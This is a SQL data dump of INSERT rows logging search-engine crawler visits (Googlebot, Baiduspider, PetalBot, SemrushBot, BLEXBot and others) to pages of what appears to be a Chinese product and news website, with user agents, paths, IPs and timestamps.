INSERT INTO `ey_weapp_spider_visit` VALUES ('94426', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.112', '1660270926', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94871', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/message', '114.119.151.155', '1660512909', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94878', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/148.html', '114.119.151.153', '1660516916', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94872', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/neimenggu.html', '114.119.151.153', '1660513047', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94874', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xn.html', '114.119.151.155', '1660514355', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94875', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/101.html', '216.244.66.194', '1660514676', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94888', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/112.html', '185.191.171.37', '1660521407', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94895', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/98.html', '185.191.171.7', '1660531160', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94897', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_28.html', '185.191.171.39', '1660531181', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94901', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/239.html', '114.119.151.155', '1660532813', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94909', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/92.html', '114.119.151.155', '1660537132', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94905', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/148.html', '185.191.171.10', '1660533568', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94904', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '36.234.107.122', '1660533183', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94906', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/162.html', '207.46.13.59', '1660533838', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94908', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.41', '1660536576', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99164', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/tuobeng/', '162.55.86.60', '1662487785', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99160', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/267.html', '162.55.86.60', '1662487768', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99161', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/list_2_2/', '162.55.86.60', '1662487771', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99171', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tl.html', '114.119.151.146', '1662488466', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99168', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/160.html', '114.119.151.153', '1662488214', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99173', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/162.html', '114.119.151.153', '1662488558', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99174', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hengyang.html', '114.119.151.153', '1662488630', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99170', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/121.html', '66.249.79.112', '1662488333', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99158', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_5/', '162.55.86.60', '1662487760', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99187', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.112', '1662493989', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99176', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_35/', '114.119.151.146', '1662488712', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99177', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/69.html', '114.119.151.153', '1662488794', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99154', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1662487740', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99153', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/498.html', '162.55.86.60', '1662487740', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99149', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/493.html', '162.55.86.60', '1662487724', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99150', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/494.html', '162.55.86.60', '1662487728', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99185', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jincheng.html', '114.119.151.146', '1662491212', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99105', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_5/', '162.55.86.60', '1662487537', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99183', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/city/shanghaishi.html', '220.181.108.155', '1662490166', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99098', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljwd/list_20_3/', '162.55.86.60', '1662487508', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99100', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljwd/list_20_5/', '162.55.86.60', '1662487514', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99122', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/list_4_2/', '162.55.86.60', '1662487607', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99124', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/list_4_3/', '162.55.86.60', '1662487611', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99103', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_3/', '162.55.86.60', '1662487525', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99104', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_4/', '162.55.86.60', '1662487533', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99106', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_51/', '162.55.86.60', '1662487540', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99111', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/236.html', '162.55.86.60', '1662487556', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99110', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/235.html', '162.55.86.60', '1662487553', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99112', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/237.html', '162.55.86.60', '1662487560', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99113', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/238.html', '162.55.86.60', '1662487563', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99118', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/65.html', '162.55.86.60', '1662487588', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99091', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/list_19_3/', '162.55.86.60', '1662487486', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99102', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_2/', '162.55.86.60', '1662487521', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99157', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_4/', '162.55.86.60', '1662487755', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99131', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/257.html', '162.55.86.60', '1662487643', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99132', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/258.html', '162.55.86.60', '1662487649', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99147', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/491.html', '162.55.86.60', '1662487716', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99138', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/314.html', '162.55.86.60', '1662487679', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99139', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/373.html', '162.55.86.60', '1662487685', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99140', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/433.html', '162.55.86.60', '1662487690', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99145', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/490.html', '162.55.86.60', '1662487711', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99146', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/city/wuxi.html', '220.181.108.177', '1662487711', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99193', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/388.html', '185.191.171.2', '1662497734', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99195', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_20.html', '185.191.171.25', '1662498732', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99090', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/list_19_2/', '162.55.86.60', '1662487478', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94923', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_42.html', '116.179.32.220', '1660539307', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94966', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_7.html', '185.191.171.14', '1660564826', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95166', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/262.html', '185.191.171.41', '1660652350', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95172', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/232.html', '66.249.79.110', '1660653727', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95178', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/nanling.html', '114.119.151.153', '1660656154', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95179', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/hangyexinwen/list_18_14/', '114.119.151.153', '1660656518', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99086', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/city/lianyungang.html', '220.181.108.156', '1662484366', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99115', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/240.html', '162.55.86.60', '1662487576', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99116', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/241.html', '162.55.86.60', '1662487580', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99096', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/blj/list_12_2/', '162.55.86.60', '1662487502', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95183', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_53/', '116.179.32.77', '1660658956', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95184', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/334.html', '114.119.151.153', '1660658970', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95187', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_38.html', '116.179.32.152', '1660660922', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95215', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/481.html', '185.191.171.6', '1660676129', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95190', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/472.html', '114.119.151.155', '1660661770', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95191', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/372.html', '66.249.79.110', '1660661946', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95195', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/102.html', '66.249.79.129', '1660663846', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95232', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.35', '1660691813', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95250', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/438.html', '114.119.151.155', '1660703607', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95507', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_44/', '116.179.32.103', '1660860676', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95252', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/pys.html', '114.119.151.155', '1660704721', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95253', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/343.html', '114.119.151.155', '1660704956', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95506', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.135', '1660859104', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95255', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sxs.html', '114.119.151.153', '1660705342', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95256', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/279.html', '114.119.151.155', '1660705548', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95503', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/146.html', '114.119.151.153', '1660858623', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95258', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/174_2.html', '185.191.171.4', '1660706129', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95259', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yl.html', '114.119.151.153', '1660706656', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95261', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1660708833', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95501', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/401.html', '114.119.151.155', '1660857109', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95262', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/82.html', '66.249.79.112', '1660710061', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95270', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_8.html', '185.191.171.13', '1660717189', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95271', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/19_4.html', '185.191.171.24', '1660717211', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95273', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_9.html', '185.191.171.4', '1660719771', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95274', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/165.html', '116.179.32.197', '1660719833', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95276', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_37/', '185.191.171.10', '1660721425', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95478', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/wfs.html', '114.119.151.153', '1660841079', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95284', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/150.html', '185.191.171.4', '1660724770', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95280', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.203', '1660722476', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95282', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/19.html', '116.179.32.195', '1660723416', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95461', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/266.html', '66.249.79.112', '1660832890', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95468', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/228.html', '185.191.171.44', '1660835110', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95285', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_26/', '116.179.32.167', '1660725379', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95286', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/202.html', '114.119.151.155', '1660725611', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99071', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/125.html', '116.179.32.146', '1662479009', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99070', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bcxw/', '220.181.108.102', '1662478124', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99123', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/230.html', '66.249.79.112', '1662487609', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99069', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.232', '1662478117', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99064', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_32.html', '185.191.171.13', '1662476899', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99060', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products', '116.179.32.85', '1662475438', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99066', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/450.html', '66.249.79.108', '1662477412', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95372', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/335.html', '116.179.32.14', '1660778852', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99058', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_13.html', '185.191.171.7', '1662474160', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99067', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_39/', '185.191.171.1', '1662477473', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99053', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/59.html', '185.191.171.41', '1662471287', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99049', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/74.html', '220.181.108.169', '1662467049', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99108', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/233.html', '162.55.86.60', '1662487547', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99039', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/380.html', '66.249.79.110', '1662457795', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99062', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/380.html', '66.249.79.112', '1662476106', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99037', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/bljxw/', '66.249.79.110', '1662457794', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99031', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/86.html', '162.55.86.60', '1662457479', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99032', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/tb/', '162.55.86.60', '1662457485', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99028', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/81.html', '162.55.86.60', '1662457468', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99026', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/70.html', '162.55.86.60', '1662457456', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99023', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/339.html', '162.55.86.60', '1662457436', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99024', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/368.html', '162.55.86.60', '1662457441', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99020', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/335.html', '162.55.86.60', '1662457422', '0');
